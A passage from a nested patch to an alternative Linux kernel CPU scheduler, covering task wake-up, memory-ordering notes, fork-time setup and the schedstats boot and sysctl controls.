-+		 * Alt schedule FW TODO: how to do ttwu_wake_remote
-+		 */
-+	}
-+#endif /* CONFIG_SMP */
-+
-+	__schedstat_inc(rq->ttwu_count);
-+	__schedstat_inc(p->stats.nr_wakeups);
-+}
-+
-+/*
-+ * Mark the task runnable and perform wakeup-preemption.
-+ */
-+static inline void
-+ttwu_do_wakeup(struct rq *rq, struct task_struct *p, int wake_flags)
-+{
-+	check_preempt_curr(rq);
-+	WRITE_ONCE(p->__state, TASK_RUNNING);
-+	trace_sched_wakeup(p);
-+}
-+
-+static inline void
-+ttwu_do_activate(struct rq *rq, struct task_struct *p, int wake_flags)
-+{
-+	if (p->sched_contributes_to_load)
-+		rq->nr_uninterruptible--;
-+
-+	if (
-+#ifdef CONFIG_SMP
-+	    !(wake_flags & WF_MIGRATED) &&
-+#endif
-+	    p->in_iowait) {
-+		delayacct_blkio_end(p);
-+		atomic_dec(&task_rq(p)->nr_iowait);
-+	}
-+
-+	activate_task(p, rq);
-+	ttwu_do_wakeup(rq, p, 0);
-+}
-+
-+/*
-+ * Consider @p being inside a wait loop:
-+ *
-+ *   for (;;) {
-+ *      set_current_state(TASK_UNINTERRUPTIBLE);
-+ *
-+ *      if (CONDITION)
-+ *         break;
-+ *
-+ *      schedule();
-+ *   }
-+ *   __set_current_state(TASK_RUNNING);
-+ *
-+ * between set_current_state() and schedule(). In this case @p is still
-+ * runnable, so all that needs doing is change p->state back to TASK_RUNNING in
-+ * an atomic manner.
-+ *
-+ * By taking task_rq(p)->lock we serialize against schedule(), if @p->on_rq
-+ * then schedule() must still happen and p->state can be changed to
-+ * TASK_RUNNING. Otherwise we lost the race, schedule() has happened, and we
-+ * need to do a full wakeup with enqueue.
-+ *
-+ * Returns: %true when the wakeup is done,
-+ *          %false otherwise.
-+ */
-+static int ttwu_runnable(struct task_struct *p, int wake_flags)
-+{
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+	int ret = 0;
-+
-+	rq = __task_access_lock(p, &lock);
-+	if (task_on_rq_queued(p)) {
-+		/* check_preempt_curr() may use rq clock */
-+		update_rq_clock(rq);
-+		ttwu_do_wakeup(rq, p, wake_flags);
-+		ret = 1;
-+	}
-+	__task_access_unlock(p, lock);
-+
-+	return ret;
-+}
-+
-+#ifdef CONFIG_SMP
-+void sched_ttwu_pending(void *arg)
-+{
-+	struct llist_node *llist = arg;
-+	struct rq *rq = this_rq();
-+	struct task_struct *p, *t;
-+	struct rq_flags rf;
-+
-+	if (!llist)
-+		return;
-+
-+	/*
-+	 * rq::ttwu_pending is a racy indication of outstanding wakeups.
-+	 * Races such that false negatives are possible, since they
-+	 * are shorter lived than false positives would be.
-+	 */
-+	WRITE_ONCE(rq->ttwu_pending, 0);
-+
-+	rq_lock_irqsave(rq, &rf);
-+	update_rq_clock(rq);
-+
-+	llist_for_each_entry_safe(p, t, llist, wake_entry.llist) {
-+		if (WARN_ON_ONCE(p->on_cpu))
-+			smp_cond_load_acquire(&p->on_cpu, !VAL);
-+
-+		if (WARN_ON_ONCE(task_cpu(p) != cpu_of(rq)))
-+			set_task_cpu(p, cpu_of(rq));
-+
-+		ttwu_do_activate(rq, p, p->sched_remote_wakeup ? WF_MIGRATED : 0);
-+	}
-+
-+	rq_unlock_irqrestore(rq, &rf);
-+}
-+
-+void send_call_function_single_ipi(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (!set_nr_if_polling(rq->idle))
-+		arch_send_call_function_single_ipi(cpu);
-+	else
-+		trace_sched_wake_idle_without_ipi(cpu);
-+}
-+
-+/*
-+ * Queue a task on the target CPU's wake_list and wake the CPU via IPI if
-+ * necessary. The wakee CPU on receipt of the IPI will queue the task
-+ * via sched_ttwu_wakeup() for activation so the wakee incurs the cost
-+ * of the wakeup instead of the waker.
-+ */
-+static void __ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	p->sched_remote_wakeup = !!(wake_flags & WF_MIGRATED);
-+
-+	WRITE_ONCE(rq->ttwu_pending, 1);
-+	__smp_call_single_queue(cpu, &p->wake_entry.llist);
-+}
-+
-+static inline bool ttwu_queue_cond(struct task_struct *p, int cpu)
-+{
-+	/*
-+	 * Do not complicate things with the async wake_list while the CPU is
-+	 * in hotplug state.
-+	 */
-+	if (!cpu_active(cpu))
-+		return false;
-+
-+	/* Ensure the task will still be allowed to run on the CPU. */
-+	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
-+		return false;
-+
-+	/*
-+	 * If the CPU does not share cache, then queue the task on the
-+	 * remote rq's wakelist to avoid accessing remote data.
-+	 */
-+	if (!cpus_share_cache(smp_processor_id(), cpu))
-+		return true;
-+
-+	if (cpu == smp_processor_id())
-+		return false;
-+
-+	/*
-+	 * If the wakee CPU is idle, or the task is descheduling and the
-+	 * only running task on the CPU, then use the wakelist to offload
-+	 * the task activation to the idle (or soon-to-be-idle) CPU as
-+	 * the current CPU is likely busy. nr_running is checked to
-+	 * avoid unnecessary task stacking.
-+	 *
-+	 * Note that we can only get here with (wakee) p->on_rq=0;
-+	 * p->on_cpu can be whatever, but we've done the dequeue, so
-+	 * the wakee has been accounted out of ->nr_running.
-+	 */
-+	if (!cpu_rq(cpu)->nr_running)
-+		return true;
-+
-+	return false;
-+}
-+
-+static bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	if (__is_defined(ALT_SCHED_TTWU_QUEUE) && ttwu_queue_cond(p, cpu)) {
-+		sched_clock_cpu(cpu); /* Sync clocks across CPUs */
-+		__ttwu_queue_wakelist(p, cpu, wake_flags);
-+		return true;
-+	}
-+
-+	return false;
-+}
-+
-+void wake_up_if_idle(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	rcu_read_lock();
-+
-+	if (!is_idle_task(rcu_dereference(rq->curr)))
-+		goto out;
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	if (is_idle_task(rq->curr))
-+		resched_curr(rq);
-+	/* Else CPU is not idle, do nothing here */
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+out:
-+	rcu_read_unlock();
-+}
-+
-+bool cpus_share_cache(int this_cpu, int that_cpu)
-+{
-+	if (this_cpu == that_cpu)
-+		return true;
-+
-+	return per_cpu(sd_llc_id, this_cpu) == per_cpu(sd_llc_id, that_cpu);
-+}
-+#else /* !CONFIG_SMP */
-+
-+static inline bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	return false;
-+}
-+
-+#endif /* CONFIG_SMP */
-+
-+static inline void ttwu_queue(struct task_struct *p, int cpu, int wake_flags)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (ttwu_queue_wakelist(p, cpu, wake_flags))
-+		return;
-+
-+	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
-+	ttwu_do_activate(rq, p, wake_flags);
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+/*
-+ * Invoked from try_to_wake_up() to check whether the task can be woken up.
-+ *
-+ * The caller holds p::pi_lock if p != current or has preemption
-+ * disabled when p == current.
-+ *
-+ * The rules of PREEMPT_RT saved_state:
-+ *
-+ *   The related locking code always holds p::pi_lock when updating
-+ *   p::saved_state, which means the code is fully serialized in both cases.
-+ *
-+ *   The lock wait and lock wakeups happen via TASK_RTLOCK_WAIT, with no
-+ *   other bits set. This makes it possible to distinguish all wakeup
-+ *   scenarios.
-+ */
-+static __always_inline
-+bool ttwu_state_match(struct task_struct *p, unsigned int state, int *success)
-+{
-+	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)) {
-+		WARN_ON_ONCE((state & TASK_RTLOCK_WAIT) &&
-+			     state != TASK_RTLOCK_WAIT);
-+	}
-+
-+	if (READ_ONCE(p->__state) & state) {
-+		*success = 1;
-+		return true;
-+	}
-+
-+#ifdef CONFIG_PREEMPT_RT
-+	/*
-+	 * Saved state preserves the task state across blocking on
-+	 * an RT lock.  If the state matches, set p::saved_state to
-+	 * TASK_RUNNING, but do not wake the task because it waits
-+	 * for a lock wakeup. Also indicate success because from
-+	 * the regular waker's point of view this has succeeded.
-+	 *
-+	 * After acquiring the lock the task will restore p::__state
-+	 * from p::saved_state which ensures that the regular
-+	 * wakeup is not lost. The restore will also set
-+	 * p::saved_state to TASK_RUNNING so any further tests will
-+	 * not result in false positives vs. @success
-+	 */
-+	if (p->saved_state & state) {
-+		p->saved_state = TASK_RUNNING;
-+		*success = 1;
-+	}
-+#endif
-+	return false;
-+}
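-+
-+/*
-+ * Example of the PREEMPT_RT branch above: a task that slept in
-+ * TASK_INTERRUPTIBLE and then blocked on an RT spinlock has
-+ * __state = TASK_RTLOCK_WAIT and saved_state = TASK_INTERRUPTIBLE.
-+ * A signal wakeup (state mask including TASK_INTERRUPTIBLE) flips
-+ * saved_state to TASK_RUNNING and reports success, but does not enqueue
-+ * the task; the lock wakeup does that, and restoring __state from
-+ * saved_state keeps the regular wakeup from being lost.
-+ */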
-+
-+/*
-+ * Notes on Program-Order guarantees on SMP systems.
-+ *
-+ *  MIGRATION
-+ *
-+ * The basic program-order guarantee on SMP systems is that when a task [t]
-+ * migrates, all its activity on its old CPU [c0] happens-before any subsequent
-+ * execution on its new CPU [c1].
-+ *
-+ * For migration (of runnable tasks) this is provided by the following means:
-+ *
-+ *  A) UNLOCK of the rq(c0)->lock scheduling out task t
-+ *  B) migration for t is required to synchronize *both* rq(c0)->lock and
-+ *     rq(c1)->lock (if not at the same time, then in that order).
-+ *  C) LOCK of the rq(c1)->lock scheduling in task
-+ *
-+ * Transitivity guarantees that B happens after A and C after B.
-+ * Note: we only require RCpc transitivity.
-+ * Note: the CPU doing B need not be c0 or c1
-+ *
-+ * Example:
-+ *
-+ *   CPU0            CPU1            CPU2
-+ *
-+ *   LOCK rq(0)->lock
-+ *   sched-out X
-+ *   sched-in Y
-+ *   UNLOCK rq(0)->lock
-+ *
-+ *                                   LOCK rq(0)->lock // orders against CPU0
-+ *                                   dequeue X
-+ *                                   UNLOCK rq(0)->lock
-+ *
-+ *                                   LOCK rq(1)->lock
-+ *                                   enqueue X
-+ *                                   UNLOCK rq(1)->lock
-+ *
-+ *                   LOCK rq(1)->lock // orders against CPU2
-+ *                   sched-out Z
-+ *                   sched-in X
-+ *                   UNLOCK rq(1)->lock
-+ *
-+ *
-+ *  BLOCKING -- aka. SLEEP + WAKEUP
-+ *
-+ * For blocking we (obviously) need to provide the same guarantee as for
-+ * migration. However the means are completely different as there is no lock
-+ * chain to provide order. Instead we do:
-+ *
-+ *   1) smp_store_release(X->on_cpu, 0)   -- finish_task()
-+ *   2) smp_cond_load_acquire(!X->on_cpu) -- try_to_wake_up()
-+ *
-+ * Example:
-+ *
-+ *   CPU0 (schedule)  CPU1 (try_to_wake_up) CPU2 (schedule)
-+ *
-+ *   LOCK rq(0)->lock LOCK X->pi_lock
-+ *   dequeue X
-+ *   sched-out X
-+ *   smp_store_release(X->on_cpu, 0);
-+ *
-+ *                    smp_cond_load_acquire(&X->on_cpu, !VAL);
-+ *                    X->state = WAKING
-+ *                    set_task_cpu(X,2)
-+ *
-+ *                    LOCK rq(2)->lock
-+ *                    enqueue X
-+ *                    X->state = RUNNING
-+ *                    UNLOCK rq(2)->lock
-+ *
-+ *                                          LOCK rq(2)->lock // orders against CPU1
-+ *                                          sched-out Z
-+ *                                          sched-in X
-+ *                                          UNLOCK rq(2)->lock
-+ *
-+ *                    UNLOCK X->pi_lock
-+ *   UNLOCK rq(0)->lock
-+ *
-+ *
-+ * However, for wakeups there is a second guarantee we must provide, namely we
-+ * must observe the state that led to our wakeup. That is, not only must our
-+ * task observe its own prior state, it must also observe the stores prior to
-+ * its wakeup.
-+ *
-+ * This means that any means of doing remote wakeups must order the CPU doing
-+ * the wakeup against the CPU the task is going to end up running on. This,
-+ * however, is already required for the regular Program-Order guarantee above,
-+ * since the waking CPU is the one issuing the ACQUIRE (smp_cond_load_acquire).
-+ *
-+ */
-+
-+/**
-+ * try_to_wake_up - wake up a thread
-+ * @p: the thread to be awakened
-+ * @state: the mask of task states that can be woken
-+ * @wake_flags: wake modifier flags (WF_*)
-+ *
-+ * Conceptually does:
-+ *
-+ *   If (@state & @p->state) @p->state = TASK_RUNNING.
-+ *
-+ * If the task was not queued/runnable, also place it back on a runqueue.
-+ *
-+ * This function is atomic against schedule() which would dequeue the task.
-+ *
-+ * It issues a full memory barrier before accessing @p->state, see the comment
-+ * with set_current_state().
-+ *
-+ * Uses p->pi_lock to serialize against concurrent wake-ups.
-+ *
-+ * Relies on p->pi_lock stabilizing:
-+ *  - p->sched_class
-+ *  - p->cpus_ptr
-+ *  - p->sched_task_group
-+ * in order to do migration, see its use of select_task_rq()/set_task_cpu().
-+ *
-+ * Tries really hard to only take one task_rq(p)->lock for performance.
-+ * Takes rq->lock in:
-+ *  - ttwu_runnable()    -- old rq, unavoidable, see comment there;
-+ *  - ttwu_queue()       -- new rq, for enqueue of the task;
-+ *  - psi_ttwu_dequeue() -- much sadness :-( accounting will kill us.
-+ *
-+ * As a consequence we race really badly with just about everything. See the
-+ * many memory barriers and their comments for details.
-+ *
-+ * Return: %true if @p->state changes (an actual wakeup was done),
-+ *	   %false otherwise.
-+ */
-+static int try_to_wake_up(struct task_struct *p, unsigned int state,
-+			  int wake_flags)
-+{
-+	unsigned long flags;
-+	int cpu, success = 0;
-+
-+	preempt_disable();
-+	if (p == current) {
-+		/*
-+		 * We're waking current, this means 'p->on_rq' and 'task_cpu(p)
-+		 * == smp_processor_id()'. Together this means we can special
-+		 * case the whole 'p->on_rq && ttwu_runnable()' case below
-+		 * without taking any locks.
-+		 *
-+		 * In particular:
-+		 *  - we rely on Program-Order guarantees for all the ordering,
-+		 *  - we're serialized against set_special_state() by virtue of
-+		 *    it disabling IRQs (this allows not taking ->pi_lock).
-+		 */
-+		if (!ttwu_state_match(p, state, &success))
-+			goto out;
-+
-+		trace_sched_waking(p);
-+		WRITE_ONCE(p->__state, TASK_RUNNING);
-+		trace_sched_wakeup(p);
-+		goto out;
-+	}
-+
-+	/*
-+	 * If we are going to wake up a thread waiting for CONDITION we
-+	 * need to ensure that CONDITION=1 done by the caller can not be
-+	 * reordered with p->state check below. This pairs with smp_store_mb()
-+	 * in set_current_state() that the waiting thread does.
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	smp_mb__after_spinlock();
-+	if (!ttwu_state_match(p, state, &success))
-+		goto unlock;
-+
-+	trace_sched_waking(p);
-+
-+	/*
-+	 * Ensure we load p->on_rq _after_ p->state, otherwise it would
-+	 * be possible to, falsely, observe p->on_rq == 0 and get stuck
-+	 * in smp_cond_load_acquire() below.
-+	 *
-+	 * sched_ttwu_pending()			try_to_wake_up()
-+	 *   STORE p->on_rq = 1			  LOAD p->state
-+	 *   UNLOCK rq->lock
-+	 *
-+	 * __schedule() (switch to task 'p')
-+	 *   LOCK rq->lock			  smp_rmb();
-+	 *   smp_mb__after_spinlock();
-+	 *   UNLOCK rq->lock
-+	 *
-+	 * [task p]
-+	 *   STORE p->state = UNINTERRUPTIBLE	  LOAD p->on_rq
-+	 *
-+	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
-+	 * __schedule().  See the comment for smp_mb__after_spinlock().
-+	 *
-+	 * A similar smp_rmb() lives in try_invoke_on_locked_down_task().
-+	 */
-+	smp_rmb();
-+	if (READ_ONCE(p->on_rq) && ttwu_runnable(p, wake_flags))
-+		goto unlock;
-+
-+#ifdef CONFIG_SMP
-+	/*
-+	 * Ensure we load p->on_cpu _after_ p->on_rq, otherwise it would be
-+	 * possible to, falsely, observe p->on_cpu == 0.
-+	 *
-+	 * One must be running (->on_cpu == 1) in order to remove oneself
-+	 * from the runqueue.
-+	 *
-+	 * __schedule() (switch to task 'p')	try_to_wake_up()
-+	 *   STORE p->on_cpu = 1		  LOAD p->on_rq
-+	 *   UNLOCK rq->lock
-+	 *
-+	 * __schedule() (put 'p' to sleep)
-+	 *   LOCK rq->lock			  smp_rmb();
-+	 *   smp_mb__after_spinlock();
-+	 *   STORE p->on_rq = 0			  LOAD p->on_cpu
-+	 *
-+	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
-+	 * __schedule().  See the comment for smp_mb__after_spinlock().
-+	 *
-+	 * Form a control-dep-acquire with p->on_rq == 0 above, to ensure
-+	 * schedule()'s deactivate_task() has 'happened' and p will no longer
-+	 * care about its own p->state. See the comment in __schedule().
-+	 */
-+	smp_acquire__after_ctrl_dep();
-+
-+	/*
-+	 * We're doing the wakeup (@success == 1), they did a dequeue (p->on_rq
-+	 * == 0), which means we need to do an enqueue, change p->state to
-+	 * TASK_WAKING such that we can unlock p->pi_lock before doing the
-+	 * enqueue, such as ttwu_queue_wakelist().
-+	 */
-+	WRITE_ONCE(p->__state, TASK_WAKING);
-+
-+	/*
-+	 * If the owning (remote) CPU is still in the middle of schedule() with
-+	 * this task as prev, consider queueing p on the remote CPU's wake_list,
-+	 * which potentially sends an IPI instead of spinning on p->on_cpu to
-+	 * let the waker make forward progress. This is safe because IRQs are
-+	 * disabled and the IPI will deliver after on_cpu is cleared.
-+	 *
-+	 * Ensure we load task_cpu(p) after p->on_cpu:
-+	 *
-+	 * set_task_cpu(p, cpu);
-+	 *   STORE p->cpu = @cpu
-+	 * __schedule() (switch to task 'p')
-+	 *   LOCK rq->lock
-+	 *   smp_mb__after_spin_lock()          smp_cond_load_acquire(&p->on_cpu)
-+	 *   STORE p->on_cpu = 1                LOAD p->cpu
-+	 *
-+	 * to ensure we observe the correct CPU on which the task is currently
-+	 * scheduling.
-+	 */
-+	if (smp_load_acquire(&p->on_cpu) &&
-+	    ttwu_queue_wakelist(p, task_cpu(p), wake_flags))
-+		goto unlock;
-+
-+	/*
-+	 * If the owning (remote) CPU is still in the middle of schedule() with
-+	 * this task as prev, wait until it's done referencing the task.
-+	 *
-+	 * Pairs with the smp_store_release() in finish_task().
-+	 *
-+	 * This ensures that tasks getting woken will be fully ordered against
-+	 * their previous state and preserve Program Order.
-+	 */
-+	smp_cond_load_acquire(&p->on_cpu, !VAL);
-+
-+	sched_task_ttwu(p);
-+
-+	cpu = select_task_rq(p);
-+
-+	if (cpu != task_cpu(p)) {
-+		if (p->in_iowait) {
-+			delayacct_blkio_end(p);
-+			atomic_dec(&task_rq(p)->nr_iowait);
-+		}
-+
-+		wake_flags |= WF_MIGRATED;
-+		psi_ttwu_dequeue(p);
-+		set_task_cpu(p, cpu);
-+	}
-+#else
-+	cpu = task_cpu(p);
-+#endif /* CONFIG_SMP */
-+
-+	ttwu_queue(p, cpu, wake_flags);
-+unlock:
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+out:
-+	if (success)
-+		ttwu_stat(p, task_cpu(p), wake_flags);
-+	preempt_enable();
-+
-+	return success;
-+}
-+
-+static bool __task_needs_rq_lock(struct task_struct *p)
-+{
-+	unsigned int state = READ_ONCE(p->__state);
-+
-+	/*
-+	 * Since pi->lock blocks try_to_wake_up(), we don't need rq->lock when
-+	 * the task is blocked. Make sure to check @state since ttwu() can drop
-+	 * locks at the end, see ttwu_queue_wakelist().
-+	 */
-+	if (state == TASK_RUNNING || state == TASK_WAKING)
-+		return true;
-+
-+	/*
-+	 * Ensure we load p->on_rq after p->__state, otherwise it would be
-+	 * possible to, falsely, observe p->on_rq == 0.
-+	 *
-+	 * See try_to_wake_up() for a longer comment.
-+	 */
-+	smp_rmb();
-+	if (p->on_rq)
-+		return true;
-+
-+#ifdef CONFIG_SMP
-+	/*
-+	 * Ensure the task has finished __schedule() and will not be referenced
-+	 * anymore. Again, see try_to_wake_up() for a longer comment.
-+	 */
-+	smp_rmb();
-+	smp_cond_load_acquire(&p->on_cpu, !VAL);
-+#endif
-+
-+	return false;
-+}
-+
-+/**
-+ * task_call_func - Invoke a function on task in fixed state
-+ * @p: Process for which the function is to be invoked, can be @current.
-+ * @func: Function to invoke.
-+ * @arg: Argument to function.
-+ *
-+ * Fix the task in its current state by avoiding wakeups and/or rq operations
-+ * and call @func(@arg) on it.  This function can use ->on_rq and task_curr()
-+ * to work out what the state is, if required.  Given that @func can be invoked
-+ * with a runqueue lock held, it had better be quite lightweight.
-+ *
-+ * Returns:
-+ *   Whatever @func returns
-+ */
-+int task_call_func(struct task_struct *p, task_call_f func, void *arg)
-+{
-+	struct rq *rq = NULL;
-+	struct rq_flags rf;
-+	int ret;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, rf.flags);
-+
-+	if (__task_needs_rq_lock(p))
-+		rq = __task_rq_lock(p, &rf);
-+
-+	/*
-+	 * At this point the task is pinned; either:
-+	 *  - blocked and we're holding off wakeups      (pi->lock)
-+	 *  - woken, and we're holding off enqueue       (rq->lock)
-+	 *  - queued, and we're holding off schedule     (rq->lock)
-+	 *  - running, and we're holding off de-schedule (rq->lock)
-+	 *
-+	 * The called function (@func) can use: task_curr(), p->on_rq and
-+	 * p->__state to differentiate between these states.
-+	 */
-+	ret = func(p, arg);
-+
-+	if (rq)
-+		__task_rq_unlock(rq, &rf);
-+
-+	raw_spin_unlock_irqrestore(&p->pi_lock, rf.flags);
-+	return ret;
-+}
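-+
-+/*
-+ * Hypothetical usage sketch for task_call_func() (the names here are
-+ * illustrative, not kernel API): a lightweight callback sampling the
-+ * pinned task's state:
-+ *
-+ *   static int get_task_state(struct task_struct *p, void *arg)
-+ *   {
-+ *           return READ_ONCE(p->__state);
-+ *   }
-+ *
-+ *   state = task_call_func(p, get_task_state, NULL);
-+ */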
-+
-+/**
-+ * cpu_curr_snapshot - Return a snapshot of the currently running task
-+ * @cpu: The CPU on which to snapshot the task.
-+ *
-+ * Returns the task_struct pointer of the task "currently" running on
-+ * the specified CPU.  If the same task is running on that CPU throughout,
-+ * the return value will be a pointer to that task's task_struct structure.
-+ * If the CPU did any context switches even vaguely concurrently with the
-+ * execution of this function, the return value will be a pointer to the
-+ * task_struct structure of a randomly chosen task that was running on
-+ * that CPU somewhere around the time that this function was executing.
-+ *
-+ * If the specified CPU was offline, the return value is whatever it
-+ * is, perhaps a pointer to the task_struct structure of that CPU's idle
-+ * task, but there is no guarantee.  Callers wishing a useful return
-+ * value must take some action to ensure that the specified CPU remains
-+ * online throughout.
-+ *
-+ * This function executes full memory barriers before and after fetching
-+ * the pointer, which permits the caller to confine this function's fetch
-+ * with respect to the caller's accesses to other shared variables.
-+ */
-+struct task_struct *cpu_curr_snapshot(int cpu)
-+{
-+	struct task_struct *t;
-+
-+	smp_mb(); /* Pairing determined by caller's synchronization design. */
-+	t = rcu_dereference(cpu_curr(cpu));
-+	smp_mb(); /* Pairing determined by caller's synchronization design. */
-+	return t;
-+}
-+
-+/**
-+ * wake_up_process - Wake up a specific process
-+ * @p: The process to be woken up.
-+ *
-+ * Attempt to wake up the nominated process and move it to the set of runnable
-+ * processes.
-+ *
-+ * Return: 1 if the process was woken up, 0 if it was already running.
-+ *
-+ * This function executes a full memory barrier before accessing the task state.
-+ */
-+int wake_up_process(struct task_struct *p)
-+{
-+	return try_to_wake_up(p, TASK_NORMAL, 0);
-+}
-+EXPORT_SYMBOL(wake_up_process);
-+
-+int wake_up_state(struct task_struct *p, unsigned int state)
-+{
-+	return try_to_wake_up(p, state, 0);
-+}
-+
-+/*
-+ * Perform scheduler related setup for a newly forked process p.
-+ * p is forked by current.
-+ *
-+ * __sched_fork() is basic setup used by init_idle() too:
-+ */
-+static inline void __sched_fork(unsigned long clone_flags, struct task_struct *p)
-+{
-+	p->on_rq			= 0;
-+	p->on_cpu			= 0;
-+	p->utime			= 0;
-+	p->stime			= 0;
-+	p->sched_time			= 0;
-+
-+#ifdef CONFIG_SCHEDSTATS
-+	/* Even if schedstat is disabled, there should not be garbage */
-+	memset(&p->stats, 0, sizeof(p->stats));
-+#endif
-+
-+#ifdef CONFIG_PREEMPT_NOTIFIERS
-+	INIT_HLIST_HEAD(&p->preempt_notifiers);
-+#endif
-+
-+#ifdef CONFIG_COMPACTION
-+	p->capture_control = NULL;
-+#endif
-+#ifdef CONFIG_SMP
-+	p->wake_entry.u_flags = CSD_TYPE_TTWU;
-+#endif
-+}
-+
-+/*
-+ * fork()/clone()-time setup:
-+ */
-+int sched_fork(unsigned long clone_flags, struct task_struct *p)
-+{
-+	__sched_fork(clone_flags, p);
-+	/*
-+	 * We mark the process as NEW here. This guarantees that
-+	 * nobody will actually run it, and a signal or other external
-+	 * event cannot wake it up and insert it on the runqueue either.
-+	 */
-+	p->__state = TASK_NEW;
-+
-+	/*
-+	 * Make sure we do not leak PI boosting priority to the child.
-+	 */
-+	p->prio = current->normal_prio;
-+
-+	/*
-+	 * Revert to default priority/policy on fork if requested.
-+	 */
-+	if (unlikely(p->sched_reset_on_fork)) {
-+		if (task_has_rt_policy(p)) {
-+			p->policy = SCHED_NORMAL;
-+			p->static_prio = NICE_TO_PRIO(0);
-+			p->rt_priority = 0;
-+		} else if (PRIO_TO_NICE(p->static_prio) < 0)
-+			p->static_prio = NICE_TO_PRIO(0);
-+
-+		p->prio = p->normal_prio = p->static_prio;
-+
-+		/*
-+		 * We don't need the reset flag anymore after the fork. It has
-+		 * fulfilled its duty:
-+		 */
-+		p->sched_reset_on_fork = 0;
-+	}
-+
-+#ifdef CONFIG_SCHED_INFO
-+	if (unlikely(sched_info_on()))
-+		memset(&p->sched_info, 0, sizeof(p->sched_info));
-+#endif
-+	init_task_preempt_count(p);
-+
-+	return 0;
-+}
-+
-+void sched_cgroup_fork(struct task_struct *p, struct kernel_clone_args *kargs)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+
-+	/*
-+	 * Because we're not yet on the pid-hash, p->pi_lock isn't strictly
-+	 * required yet, but lockdep gets upset if rules are violated.
-+	 */
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	/*
-+	 * Share the timeslice between parent and child, thus the
-+	 * total amount of pending timeslices in the system doesn't change,
-+	 * resulting in more scheduling fairness.
-+	 */
-+	rq = this_rq();
-+	raw_spin_lock(&rq->lock);
-+
-+	rq->curr->time_slice /= 2;
-+	p->time_slice = rq->curr->time_slice;
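-+	/* e.g. a parent with 4ms left now keeps 2ms and the child gets 2ms. */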
-+#ifdef CONFIG_SCHED_HRTICK
-+	hrtick_start(rq, rq->curr->time_slice);
-+#endif
-+
-+	if (p->time_slice < RESCHED_NS) {
-+		p->time_slice = sched_timeslice_ns;
-+		resched_curr(rq);
-+	}
-+	sched_task_fork(p, rq);
-+	raw_spin_unlock(&rq->lock);
-+
-+	rseq_migrate(p);
-+	/*
-+	 * We're setting the CPU for the first time, we don't migrate,
-+	 * so use __set_task_cpu().
-+	 */
-+	__set_task_cpu(p, smp_processor_id());
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+}
-+
-+void sched_post_fork(struct task_struct *p)
-+{
-+}
-+
-+#ifdef CONFIG_SCHEDSTATS
-+
-+DEFINE_STATIC_KEY_FALSE(sched_schedstats);
-+
-+static void set_schedstats(bool enabled)
-+{
-+	if (enabled)
-+		static_branch_enable(&sched_schedstats);
-+	else
-+		static_branch_disable(&sched_schedstats);
-+}
-+
-+void force_schedstat_enabled(void)
-+{
-+	if (!schedstat_enabled()) {
-+		pr_info("kernel profiling enabled schedstats, disable via kernel.sched_schedstats.\n");
-+		static_branch_enable(&sched_schedstats);
-+	}
-+}
-+
-+static int __init setup_schedstats(char *str)
-+{
-+	int ret = 0;
-+	if (!str)
-+		goto out;
-+
-+	if (!strcmp(str, "enable")) {
-+		set_schedstats(true);
-+		ret = 1;
-+	} else if (!strcmp(str, "disable")) {
-+		set_schedstats(false);
-+		ret = 1;
-+	}
-+out:
-+	if (!ret)
-+		pr_warn("Unable to parse schedstats=\n");
-+
-+	return ret;
-+}
-+__setup("schedstats=", setup_schedstats);
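-+
-+/*
-+ * Usage: schedstats can be flipped at boot ("schedstats=enable" on the
-+ * kernel command line, parsed above) or at runtime via the sysctl below,
-+ * e.g. "sysctl kernel.sched_schedstats=1".
-+ */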
-+
-+#ifdef CONFIG_PROC_SYSCTL
-+static int sysctl_schedstats(struct ctl_table *table, int write, void *buffer,
-+		size_t *lenp, loff_t *ppos)
-+{
-+	struct ctl_table t;
-+	int err;
-+	int state = static_branch_likely(&sched_schedstats);
-+
-+	if (write && !capable(CAP_SYS_ADMIN))
-+		return -EPERM;
-+
-+	t = *table;
-+	t.data = &state;
-+	err = proc_dointvec_minmax(&t, write, buffer, lenp, ppos);
-+	if (err < 0)
-+		return err;
-+	if (write)
-+		set_schedstats(state);
-+	return err;
-+}
-+
-+static struct ctl_table sched_core_sysctls[] = {
-+	{
-+		.procname       = "sched_schedstats",
-+		.data           = NULL,
-+		.maxlen         = sizeof(unsigned int),
-+		.mode           = 0644,
-+		.proc_handler   = sysctl_schedstats,
-+		.extra1         = SYSCTL_ZERO,
-+		.extra2         = SYSCTL_ONE,
-+	},
-+	{}
-+};
-+static int __init sched_core_sysctl_init(void)
-+{
-+	register_sysctl_init("kernel", sched_core_sysctls);
-+	return 0;
-+}
-+late_initcall(sched_core_sysctl_init);
-+#endif /* CONFIG_PROC_SYSCTL */
-+#endif /* CONFIG_SCHEDSTATS */
-+
-+/*
-+ * wake_up_new_task - wake up a newly created task for the first time.
-+ *
-+ * This function will do some initial scheduler statistics housekeeping
-+ * that must be done for every newly created context, then puts the task
-+ * on the runqueue and wakes it.
-+ */
-+void wake_up_new_task(struct task_struct *p)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	WRITE_ONCE(p->__state, TASK_RUNNING);
-+	rq = cpu_rq(select_task_rq(p));
-+#ifdef CONFIG_SMP
